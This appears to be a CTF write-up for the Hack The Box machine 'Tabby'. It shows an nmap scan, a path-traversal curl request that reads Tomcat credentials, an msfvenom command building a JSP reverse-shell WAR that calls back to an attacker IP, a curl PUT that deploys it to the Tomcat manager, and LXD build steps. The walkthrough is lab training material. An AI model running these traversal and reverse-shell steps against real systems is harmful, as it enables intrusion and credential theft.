# Nmap 7.80 scan initiated Sat Aug 8 13:09:36 2020 as: nmap -p- -sSVC -oA nmap_full -v 10.10.10.194 Increasing send delay for 10.10.10.194 from 0 to 5 due to 649 out of 2162 dropped probes since last increase. Nmap scan report for 10.10.10.194 Host is up (0.032s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Mega Hosting 8080/tcp open http Apache Tomcat | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST |_http-open-proxy: Proxy might be redirecting requests |_http-title: Apache Tomcat Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Aug 8 13:28:24 2020 -- 1 IP address (1 host up) scanned in 1127.63 seconds
So it's seems ubuntu mapped the files differently than the apache defaults,
so it won't be $TOMCAT_HOME/conf/tomcat-users.xml but
$TOMCAT_HOME/etc/tomcat-users.xml.
$ curl 'http://megahosting.htb/news.php?file=../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml' <?xml version="1.0" encoding="UTF-8"?> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <tomcat-usersxmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd" version="1.0"> <!-- NOTE: By default, no user is included in the "manager-gui" role required to operate the "/manager/html" web application. If you wish to use this app, you must define such a user - the username and password are arbitrary. It is strongly recommended that you do NOT use one of the users in the commented out section below since they are intended for use with the examples web application. --> <!-- NOTE: The sample user and role entries below are intended for use with the examples web application. They are wrapped in a comment and thus are ignored when reading this file. If you wish to configure these users for use with the examples web application, do not forget to remove the <!.. ..> that surrounds them. You will also need to set the passwords to something appropriate. --> <!-- <role rolename="tomcat"/> <role rolename="role1"/> <user username="tomcat" password="<must-be-changed>" roles="tomcat"/> <user username="both" password="<must-be-changed>" roles="tomcat,role1"/> <user username="role1" password="<must-be-changed>" roles="role1"/> --> <rolerolename="admin-gui"/> <rolerolename="manager-script"/> <userusername="tomcat"password="$3cureP4s5w0rd123!"roles="admin-gui,manager-script"/> </tomcat-users>
where {host} and {port} represent the hostname and port number on which Tomcat is running, {command} represents the Manager command you wish to execute, and {parameters} represents the query parameters that are specific to that command. In the illustrations below, customize the host and port appropriately for your installation.
The commands are usually executed by HTTP GET requests. The /deploy command has a form that is executed by an HTTP PUT request.
Then we can read Deploy A New Application Archive (WAR) Remotely.
Upload the web application archive (WAR) file that is specified as the request data in this HTTP PUT request, install it into the appBase directory of our corresponding virtual host, and start, deriving the name for the WAR file added to the appBase from the specified path. The application can later be undeployed (and the corresponding WAR file removed) by use of the /undeploy command.
This command is executed by an HTTP PUT request.
Let's craft a WAR reverse shell.
1 2 3 4 5
$ msfvenom --list payloads | grep -i jsp java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.49 LPORT=9999 -f war > revshell.war
1 2
$ curl -X PUT -u 'tomcat':'$3cureP4s5w0rd123!' -T revshell.war 'http://tabby.htb:8080/manager/text/deploy?path=/noraj' OK - Deployed application at context path [/noraj]
$ sudo pacman -S go debootstrap rsync gnupg squashfs-tools git --needed $ go get -d -v github.com/lxc/distrobuilder/distrobuilder $ cd $HOME/go/src/github.com/lxc/distrobuilder $ make $ cd